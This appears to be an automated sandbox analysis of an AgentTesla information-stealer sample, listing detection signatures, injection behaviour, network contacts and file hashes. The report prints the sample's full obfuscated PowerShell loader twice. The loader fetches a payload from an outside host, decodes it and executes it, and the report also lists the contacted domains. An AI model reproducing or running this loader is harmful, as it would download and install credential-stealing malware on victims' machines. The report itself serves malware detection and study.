Analysis Overview
SHA256
53092890138641a8f174f2575e5078bcecf0f962f88f15169315ee58dce13342
Threat Level: Known bad
The file 53092890138641a8f174f2575e5078bcecf0f962f88f15169315ee58dce13342.lzh was found to be: Known bad.
Malicious Activity Summary
AgentTesla
Detects packed .NET executables; mostly AgentTeslaV4.
Detects executables referencing many file transfer clients. Observed in information stealers.
Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.
Detects executables referencing Windows vault credential objects. Observed in infostealers.
Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurrency wallets, etc. Observed in information stealers.
Detects executables referencing many email and collaboration clients. Observed in information stealers.
Blocklisted process makes network request
Checks computer location settings
Looks up external IP address via web service
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-04 01:22
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-04 01:22
Reported
2024-06-04 01:25
Platform
win7-20240221-en
Max time kernel
142s
Max time network
148s
Command Line
Signatures
AgentTesla
Detects packed .NET executables; mostly AgentTeslaV4.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables referencing Windows vault credential objects. Observed in infostealers.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurrency wallets, etc. Observed in information stealers.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables referencing many email and collaboration clients. Observed in information stealers.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables referencing many file transfer clients. Observed in information stealers.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2384 set thread context of 632 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Nedfrendes.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hotnesses = 1;Function Letsind($Tideless){$Makroredigeringer=$Tideless.Length-$Hotnesses;$Forethoughted='Substring';For( $Labourage=5;$Labourage -lt $Makroredigeringer;$Labourage+=6){$Irreclaimably+=$Tideless.$Forethoughted.Invoke( $Labourage, $Hotnesses);}$Irreclaimably;}function Pert($Fordyrelserne){ . ($Afbankes) ($Fordyrelserne);}$reviewal=Letsind 'U,aakMDel,noBillezBelloiKlasslD ivel,acisaBreec/Aadse5T yll.Fugem0Demop Lnked(Ski.tW BaloiTh,gmnceib,dacarao KasewVibras Mngd ForstNDebatT,vern Grske1Filo 0Afsik.Virkn0Dille;Proco onfiWForbui kalvn Hin 6Monis4 brug;Li.fj Revitx,erop6Un,id4Silde;A gif Fikspr DirevRegav:,erin1Skubb2Borte1Lntag.Ation0Ostr.)Annul HandwGHoloteDonnecOpdknk VaskoOverh/Unsli2Fgtem0C,rpi1Eleva0pap,r0Nonna1Jigab0 Epi.1Hulde CubicFUk,udiBeshirNoncae P,nifGruppo .emaxPhr s/Afgha1Media2Komp 1Overg.H.ved0til m ';$Urbanites=Letsind 'As,ebU,uncas Ind ePansrr Defl-.orgeA CostgHolleeTransnSkakstCtg.h ';$Pjalte=Letsind 'Bret.hSki.tt.ecretSuperpGe ess Admi:Falbe/Bra.r/TilbawBevgewanapswNdhj,. Hyd.iFuldsn Ti,sn R spoTempev Mahaa kirktEmboli teksv ,cieeDisapbChemiu Kun iOptiml Bi,ldR latiShibbnHaardgTige.s agbuoUnlimlH,dsiuOprult igniiOrpheoRel,qnHumlesR gne. Taati,dstdn Insc/Misogw erdep decu-ForsvcSulphoChlo,nReraitendo,eDidy,n Pse.t Fe.e/RgninuUneugp .atalVic noD pola raved Re,es agoo/ rerogDecimrReinfa Detov Potai mau t Gl.kySocio_ EjerfhexapoBlaanrL,xicmPlattsBeund/ H mnhFersk/ Legud B,li/min mbDuper/Reseeg aric/SouseAEdgebrNo chc rupphHalurvTra iiandedsLge.ji BalltMurstoFedmerDupe..OutprcskydeuionisrPolyp ';$Traktementerne=Letsind ' Unvo>God v ';$Afbankes=Letsind 'UnmonicimbreS amexTvang ';$Purposelessly='Minimumslngderne105';$Udfrslers = Letsind 'Appe,eSyntoc,agerh Antiovaado ,ordi% UraeaExocrpSelvbpvoweld,nnekaNonfit TimuaTu.ul% Tegn\underv uinaiMorbrc isimtD lirrSammeeUn hasPei,esEnoli. 
SpecDTra,duTim tl Maro Forde&fagfo&Subtl DublseQuadrcHjer hSlopsoProje hu kotMonti ';Pert (Letsind 'Teakt$jac agChunal tjero AndebBredsabandalScale:ProprMPersoa Suppk ecanrApp ioSonnenDissoa orsovSmp,snRepubeVkkelsFarma=Baksp( ForecDiaphmU,ormdgkker Lagri/Su.prcTy.eb T.ll$ F reU Kl.dd,appafCatenrRo lls Co,nlPar ietupe,r Met,sWag a)Senne ');Pert (Letsind ' Ti.k$DegaggLejeklKlgtio Stavb Dru.aPercelDotty: nembKInt,rn Sel a H.rmsAktieeMaal.tBlidg=ceint$OlicoPAnnaljnabonaparallUdfoltshoeheHeadr.smrfes UpripSarinlSca,liSupertAmids(Potas$TanisTUnwalrgs ela,stenk IrretTandbeSpjtsmSe,vpeSimpln.roret ConteDorier Un qn DesmeBisam) R,gs ');$Pjalte=$Knaset[0];$Nskeforestillinger= (Letsind 'Lac r$ Bog.gDigitlRreddoM tapb Raa.a Re,alReifi: Uh,iLFiendaBel,tr Pye.dLimfai SocieG odlrIndta=NavneN ppuseSkjo wRugbr-,ukstOGoldebe terjPos.ceFatalc overtd.opk Brn.bSTa,niyScrutsP,ecotResiseSam.lmHabit.UnsizNfletteReinvtSlvvr. CopyWStirreU inobPejseC Udv,l oomii KateeHim.enOve.ot');$Nskeforestillinger+=$Makronavnes[1];Pert ($Nskeforestillinger);Pert (Letsind 'Fo bu$A,delL ,ndeaTilgnrDefild S.apiBlybaeUdd,irTelet.Mu.deHEndege UdfoaSgekrdRejseeCha crSkrfesGrafi[Super$T,ailURkkefrfrih b Bo,ka IschnKonsuischizt Axi.eSplensSkovm]Retsf=Tmmer$ OpvirVidere UlvevLeonii UnsceGossywHa,eraMijnhlPhlog ');$Skansion=Letsind 'yiddi$N ujaLTaxafa RuelrBrebldTitaniknoppe Fes r Sty,.NunnaDDiscooirredwDedicnVersel Hearo S icaDoombdMont,FNaturiFoderlSyntaeR adp(Bev,s$Z uglP BevijRac,saErhvelInosit Vi,keOsteo,Pan i$HaglbSKalcitBro.denepheuTebe.rpadrioH andpAaremaPrint) lige ';$Steuropa=$Makronavnes[0];Pert (Letsind 'Escur$DoktogNewfolAf,beoRatiobGourmaEnasalMiner:nona EAldoxlaldereplanlvMicepa umultQ,esto UnrernatiosVagilt Hjreo IntelClose=Bundg(BenvnTManjeeIntersPseu tUnfor-PagodPimmedaHypottDuodeh R.od Nars$ etanSRein.t rakkeExsiluv,jrprLaaneo Co,opTypeba L.em)Sygej ');while (!$Elevatorstol) {Pert (Letsind 'Pigst$ Flubg Rigsl Kar oornecbEn 
draAfmejlTabel:IntegTreconrFarmeaUpdrinOveresStubouL.rilbEugensNephet.ngolaRubannUnc mtRenitiChamoa,habbl synllZ,ocyyKrads=Dolo $OratotUncerrUdeeruPoucheMytil ') ;Pert $Skansion;Pert (Letsind 'For jS S mitFagsta F yvrUrf gtRaako-TndevSActinldysk,e PredeBibl.p apst Fr lu4 rocu ');Pert (Letsind ' Frui$ObstegSamm l DomsoP.ecobGa wraenemyl Scor: grocEEnerglSex.leDop iv antaDodokt Fr.coPl,ssrFilmks Afstt Opd.oS,enul Vaes=carbo(InforTAccepePrjsesRommatGaleo- gyroPTitanablandtEndrohBista Toldo$Hlka.SHirdmtexsufeRonkeuStie rKnucloTekstpSa.doaHerb.)Hyper ') ;Pert (Letsind 'Plusv$CompogMaa el E.ico Vibrb Scy.aF,onelArbor: ffaP A,esrNedl oEasygo A gifA.strnDarwieDoubtsRmebrs Tild=Over $ kemagAndrolChalioAksembFe,aea keralGramm:KjortdEpidei RadilPraireMullitRegr tDyrehaR,mstnFamilt Rub iBihulsSa kthMolar+Me,se+ enil% lddy$UdraaKStr,nnUdefia CentsRideseAd pttnon p.ar ejcToustoDistauSparsnSildetEpiph ') ;$Pjalte=$Knaset[$Proofness];}$Genudsendelses=293407;$Falmningens=30098;Pert (Letsind 'O eri$Sup,rgMorphlS.pploKvintbAktioaHoppel arat:S,iriRGodvii SupegLachrsFormidForbra ArmegGyl.esfusenmBiosan ,ultdAmal,e Mos nEkspleKlu.t Exo a=Carot Taa,nGSpreaeHalvftBesu.-ApoteCNri go Adj.nKir.etClavieA vignRi.tat.onde U.gra$S urnSBrugetMorgee Cla u No,srDuriao Purip.ogitaUdkog ');Pert (Letsind 'S,dde$OmstdgVengel CateoFictib ambra Kinllbedst:KvoteAOv ennTon,tt AccuiUdhalgS.umbrPositaUnso.mFejesmenglea DagstStraiiFordrcsosteainelol.arti Ledo= Da a Decel[Skde,SspuliyKlbehsSkatktSub.eeSolskmOnfre.ratelCP.scao T lenUngdov DataeKadarrCen.rtAnbef]Vitam:Kryst:graveF ViperParasoSdm.fmTele.BFish,aProclsBeforeNaboe6Lysti4 .verSs aggtBrndbrsmutti.uffinProtog Suic(Fryde$CanasRSkandiJordsgUndersgarladSta da LdstgHalsss udgm,lerdnKu etdHandleGaardnKons ePriso)Sleep ');Pert (Letsind '.aktu$ ThrogFurenl.orstoCel.ubThoraa .asslRall : Pap.F ,odeo ArgytGlosshCasseeEskadrChauvgIncoriBn.eslIn bilIgleraSe,ue Imdek=Arveo Misa[MandeS Kdf.yTilgisRagsotA,diteUnconmTerne.PolieTA.asteudk.pxPh totEkstr. 
B skEJ rdonTe,olc,ragtoSpg,rdR.bboiTrioinOocysgOsmir]Diffe:Stati: KlimA umuSNicotC talIFiredISlett.In knGBritoe SucrtSu,prSNonfotOndinrEquilifintenstnksgLyop (Diplo$EjerfAFor,an utletSuperi,eopogFruitrSmaasarimetmSystemLejeka,rbeetCranriNotarcBerl,aIn,fllBi,ta)Psoad ');Pert (Letsind ' Pent$ gonogCorynlKuvero ChaobStagnaTerpelLa er:SkrogHSp ctaBidenlBobblvFuglepCowboeA istnUdtrysPr,toiblyinoPr.donPeptoe.arkinLodsb=Neant$EmulsFYngveoBegratPi tihUndere A.oerPlumrghoodliIndenlF,omml GlobaC ast. W,edsKloakuSoftwbL,skns Konst HandrRegeniTaxamnSystegDokto(Asyla$,ustvGSklenepulven ImpruStoredStyr,sUnseneSarkinMoerid StateKraftlFuldlsHare,eOve,wsT,pir,t.avl$ ,adeFNovemaI erslP sitm RubinSmreri PelsnEmpirgImineeAzo,ynQuantsFi,al) Kors ');Pert $Halvpensionen;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\victress.Dul && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Hotnesses = 1;Function Letsind($Tideless){$Makroredigeringer=$Tideless.Length-$Hotnesses;$Forethoughted='Substring';For( $Labourage=5;$Labourage -lt $Makroredigeringer;$Labourage+=6){$Irreclaimably+=$Tideless.$Forethoughted.Invoke( $Labourage, $Hotnesses);}$Irreclaimably;}function Pert($Fordyrelserne){ . ($Afbankes) ($Fordyrelserne);}$reviewal=Letsind 'U,aakMDel,noBillezBelloiKlasslD ivel,acisaBreec/Aadse5T yll.Fugem0Demop Lnked(Ski.tW BaloiTh,gmnceib,dacarao KasewVibras Mngd ForstNDebatT,vern Grske1Filo 0Afsik.Virkn0Dille;Proco onfiWForbui kalvn Hin 6Monis4 brug;Li.fj Revitx,erop6Un,id4Silde;A gif Fikspr DirevRegav:,erin1Skubb2Borte1Lntag.Ation0Ostr.)Annul HandwGHoloteDonnecOpdknk VaskoOverh/Unsli2Fgtem0C,rpi1Eleva0pap,r0Nonna1Jigab0 Epi.1Hulde CubicFUk,udiBeshirNoncae P,nifGruppo .emaxPhr s/Afgha1Media2Komp 1Overg.H.ved0til m ';$Urbanites=Letsind 'As,ebU,uncas Ind ePansrr Defl-.orgeA CostgHolleeTransnSkakstCtg.h ';$Pjalte=Letsind 'Bret.hSki.tt.ecretSuperpGe ess Admi:Falbe/Bra.r/TilbawBevgewanapswNdhj,. Hyd.iFuldsn Ti,sn R spoTempev Mahaa kirktEmboli teksv ,cieeDisapbChemiu Kun iOptiml Bi,ldR latiShibbnHaardgTige.s agbuoUnlimlH,dsiuOprult igniiOrpheoRel,qnHumlesR gne. Taati,dstdn Insc/Misogw erdep decu-ForsvcSulphoChlo,nReraitendo,eDidy,n Pse.t Fe.e/RgninuUneugp .atalVic noD pola raved Re,es agoo/ rerogDecimrReinfa Detov Potai mau t Gl.kySocio_ EjerfhexapoBlaanrL,xicmPlattsBeund/ H mnhFersk/ Legud B,li/min mbDuper/Reseeg aric/SouseAEdgebrNo chc rupphHalurvTra iiandedsLge.ji BalltMurstoFedmerDupe..OutprcskydeuionisrPolyp ';$Traktementerne=Letsind ' Unvo>God v ';$Afbankes=Letsind 'UnmonicimbreS amexTvang ';$Purposelessly='Minimumslngderne105';$Udfrslers = Letsind 'Appe,eSyntoc,agerh Antiovaado ,ordi% UraeaExocrpSelvbpvoweld,nnekaNonfit TimuaTu.ul% Tegn\underv uinaiMorbrc isimtD lirrSammeeUn hasPei,esEnoli. 
SpecDTra,duTim tl Maro Forde&fagfo&Subtl DublseQuadrcHjer hSlopsoProje hu kotMonti ';Pert (Letsind 'Teakt$jac agChunal tjero AndebBredsabandalScale:ProprMPersoa Suppk ecanrApp ioSonnenDissoa orsovSmp,snRepubeVkkelsFarma=Baksp( ForecDiaphmU,ormdgkker Lagri/Su.prcTy.eb T.ll$ F reU Kl.dd,appafCatenrRo lls Co,nlPar ietupe,r Met,sWag a)Senne ');Pert (Letsind ' Ti.k$DegaggLejeklKlgtio Stavb Dru.aPercelDotty: nembKInt,rn Sel a H.rmsAktieeMaal.tBlidg=ceint$OlicoPAnnaljnabonaparallUdfoltshoeheHeadr.smrfes UpripSarinlSca,liSupertAmids(Potas$TanisTUnwalrgs ela,stenk IrretTandbeSpjtsmSe,vpeSimpln.roret ConteDorier Un qn DesmeBisam) R,gs ');$Pjalte=$Knaset[0];$Nskeforestillinger= (Letsind 'Lac r$ Bog.gDigitlRreddoM tapb Raa.a Re,alReifi: Uh,iLFiendaBel,tr Pye.dLimfai SocieG odlrIndta=NavneN ppuseSkjo wRugbr-,ukstOGoldebe terjPos.ceFatalc overtd.opk Brn.bSTa,niyScrutsP,ecotResiseSam.lmHabit.UnsizNfletteReinvtSlvvr. CopyWStirreU inobPejseC Udv,l oomii KateeHim.enOve.ot');$Nskeforestillinger+=$Makronavnes[1];Pert ($Nskeforestillinger);Pert (Letsind 'Fo bu$A,delL ,ndeaTilgnrDefild S.apiBlybaeUdd,irTelet.Mu.deHEndege UdfoaSgekrdRejseeCha crSkrfesGrafi[Super$T,ailURkkefrfrih b Bo,ka IschnKonsuischizt Axi.eSplensSkovm]Retsf=Tmmer$ OpvirVidere UlvevLeonii UnsceGossywHa,eraMijnhlPhlog ');$Skansion=Letsind 'yiddi$N ujaLTaxafa RuelrBrebldTitaniknoppe Fes r Sty,.NunnaDDiscooirredwDedicnVersel Hearo S icaDoombdMont,FNaturiFoderlSyntaeR adp(Bev,s$Z uglP BevijRac,saErhvelInosit Vi,keOsteo,Pan i$HaglbSKalcitBro.denepheuTebe.rpadrioH andpAaremaPrint) lige ';$Steuropa=$Makronavnes[0];Pert (Letsind 'Escur$DoktogNewfolAf,beoRatiobGourmaEnasalMiner:nona EAldoxlaldereplanlvMicepa umultQ,esto UnrernatiosVagilt Hjreo IntelClose=Bundg(BenvnTManjeeIntersPseu tUnfor-PagodPimmedaHypottDuodeh R.od Nars$ etanSRein.t rakkeExsiluv,jrprLaaneo Co,opTypeba L.em)Sygej ');while (!$Elevatorstol) {Pert (Letsind 'Pigst$ Flubg Rigsl Kar oornecbEn 
draAfmejlTabel:IntegTreconrFarmeaUpdrinOveresStubouL.rilbEugensNephet.ngolaRubannUnc mtRenitiChamoa,habbl synllZ,ocyyKrads=Dolo $OratotUncerrUdeeruPoucheMytil ') ;Pert $Skansion;Pert (Letsind 'For jS S mitFagsta F yvrUrf gtRaako-TndevSActinldysk,e PredeBibl.p apst Fr lu4 rocu ');Pert (Letsind ' Frui$ObstegSamm l DomsoP.ecobGa wraenemyl Scor: grocEEnerglSex.leDop iv antaDodokt Fr.coPl,ssrFilmks Afstt Opd.oS,enul Vaes=carbo(InforTAccepePrjsesRommatGaleo- gyroPTitanablandtEndrohBista Toldo$Hlka.SHirdmtexsufeRonkeuStie rKnucloTekstpSa.doaHerb.)Hyper ') ;Pert (Letsind 'Plusv$CompogMaa el E.ico Vibrb Scy.aF,onelArbor: ffaP A,esrNedl oEasygo A gifA.strnDarwieDoubtsRmebrs Tild=Over $ kemagAndrolChalioAksembFe,aea keralGramm:KjortdEpidei RadilPraireMullitRegr tDyrehaR,mstnFamilt Rub iBihulsSa kthMolar+Me,se+ enil% lddy$UdraaKStr,nnUdefia CentsRideseAd pttnon p.ar ejcToustoDistauSparsnSildetEpiph ') ;$Pjalte=$Knaset[$Proofness];}$Genudsendelses=293407;$Falmningens=30098;Pert (Letsind 'O eri$Sup,rgMorphlS.pploKvintbAktioaHoppel arat:S,iriRGodvii SupegLachrsFormidForbra ArmegGyl.esfusenmBiosan ,ultdAmal,e Mos nEkspleKlu.t Exo a=Carot Taa,nGSpreaeHalvftBesu.-ApoteCNri go Adj.nKir.etClavieA vignRi.tat.onde U.gra$S urnSBrugetMorgee Cla u No,srDuriao Purip.ogitaUdkog ');Pert (Letsind 'S,dde$OmstdgVengel CateoFictib ambra Kinllbedst:KvoteAOv ennTon,tt AccuiUdhalgS.umbrPositaUnso.mFejesmenglea DagstStraiiFordrcsosteainelol.arti Ledo= Da a Decel[Skde,SspuliyKlbehsSkatktSub.eeSolskmOnfre.ratelCP.scao T lenUngdov DataeKadarrCen.rtAnbef]Vitam:Kryst:graveF ViperParasoSdm.fmTele.BFish,aProclsBeforeNaboe6Lysti4 .verSs aggtBrndbrsmutti.uffinProtog Suic(Fryde$CanasRSkandiJordsgUndersgarladSta da LdstgHalsss udgm,lerdnKu etdHandleGaardnKons ePriso)Sleep ');Pert (Letsind '.aktu$ ThrogFurenl.orstoCel.ubThoraa .asslRall : Pap.F ,odeo ArgytGlosshCasseeEskadrChauvgIncoriBn.eslIn bilIgleraSe,ue Imdek=Arveo Misa[MandeS Kdf.yTilgisRagsotA,diteUnconmTerne.PolieTA.asteudk.pxPh totEkstr. 
B skEJ rdonTe,olc,ragtoSpg,rdR.bboiTrioinOocysgOsmir]Diffe:Stati: KlimA umuSNicotC talIFiredISlett.In knGBritoe SucrtSu,prSNonfotOndinrEquilifintenstnksgLyop (Diplo$EjerfAFor,an utletSuperi,eopogFruitrSmaasarimetmSystemLejeka,rbeetCranriNotarcBerl,aIn,fllBi,ta)Psoad ');Pert (Letsind ' Pent$ gonogCorynlKuvero ChaobStagnaTerpelLa er:SkrogHSp ctaBidenlBobblvFuglepCowboeA istnUdtrysPr,toiblyinoPr.donPeptoe.arkinLodsb=Neant$EmulsFYngveoBegratPi tihUndere A.oerPlumrghoodliIndenlF,omml GlobaC ast. W,edsKloakuSoftwbL,skns Konst HandrRegeniTaxamnSystegDokto(Asyla$,ustvGSklenepulven ImpruStoredStyr,sUnseneSarkinMoerid StateKraftlFuldlsHare,eOve,wsT,pir,t.avl$ ,adeFNovemaI erslP sitm RubinSmreri PelsnEmpirgImineeAzo,ynQuantsFi,al) Kors ');Pert $Halvpensionen;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\victress.Dul && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.innovativebuildingsolutions.in | udp |
| IN | 103.21.58.98:443 | www.innovativebuildingsolutions.in | tcp |
| US | 8.8.8.8:53 | hutch.duniareligi.com | udp |
| ID | 202.43.173.180:443 | hutch.duniareligi.com | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.13.205:443 | api.ipify.org | tcp |
Files
memory/2480-4-0x000007FEF5ECE000-0x000007FEF5ECF000-memory.dmp
memory/2480-5-0x000000001B530000-0x000000001B812000-memory.dmp
memory/2480-6-0x0000000002800000-0x0000000002808000-memory.dmp
memory/2480-7-0x000007FEF5C10000-0x000007FEF65AD000-memory.dmp
memory/2480-8-0x000007FEF5C10000-0x000007FEF65AD000-memory.dmp
memory/2480-9-0x000007FEF5C10000-0x000007FEF65AD000-memory.dmp
memory/2480-10-0x000007FEF5C10000-0x000007FEF65AD000-memory.dmp
memory/2480-11-0x000007FEF5C10000-0x000007FEF65AD000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4CBQB6PSQ5DYFOHYMMLI.temp
| MD5 | 188d7ff50f1b9b7ee636da4db2aaeba7 |
| SHA1 | daaa7c4ac9fbeef2bfb925679fff9b3e3428adf4 |
| SHA256 | e13d47cc374756bcd58188ecfdddab1d3aaa76010b86c32719eb709ab8f432e4 |
| SHA512 | f177d36258c9f8929de098ef74ecdcc3c29b63a72f20a4cfbb9928b9bbb5bf44470263f7a6b31fa8a65ecc5f6bdaacc1eeb9ee34060f1485d867ade73584ec16 |
C:\Users\Admin\AppData\Roaming\victress.Dul
| MD5 | e55f25384365d8cb1cc6ffb71600ff50 |
| SHA1 | ffe4f34c419fd6dba313e21d53ce9b7ed309ee80 |
| SHA256 | d83c4794938826611110d3b660ae9876a5c17f8254f258cf4f64889db2c47b5e |
| SHA512 | 7f62e819c75ca50deb502dbf6b8301f926ef125d04ae0806cf50d9a76a31eddeb59142035a0e622e70e941b80769ee54abc1a64d4474f0a0ebba2023b988342c |
memory/2384-17-0x0000000006440000-0x000000000A1DE000-memory.dmp
memory/2480-19-0x000007FEF5C10000-0x000007FEF65AD000-memory.dmp
memory/2480-18-0x000007FEF5ECE000-0x000007FEF5ECF000-memory.dmp
memory/632-36-0x0000000000F10000-0x0000000001F72000-memory.dmp
memory/632-38-0x0000000000F10000-0x0000000001F72000-memory.dmp
memory/2480-39-0x000007FEF5C10000-0x000007FEF65AD000-memory.dmp
memory/632-40-0x0000000000F10000-0x0000000000F50000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-04 01:22
Reported
2024-06-04 01:25
Platform
win10v2004-20240508-en
Max time kernel
144s
Max time network
149s
Command Line
Signatures
AgentTesla
Detects packed .NET executables; mostly AgentTeslaV4.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables referencing Windows vault credential objects. Observed in infostealers.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurrency wallets, etc. Observed in information stealers.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables referencing many email and collaboration clients. Observed in information stealers.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables referencing many file transfer clients. Observed in information stealers.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2896 set thread context of 3156 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Nedfrendes.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
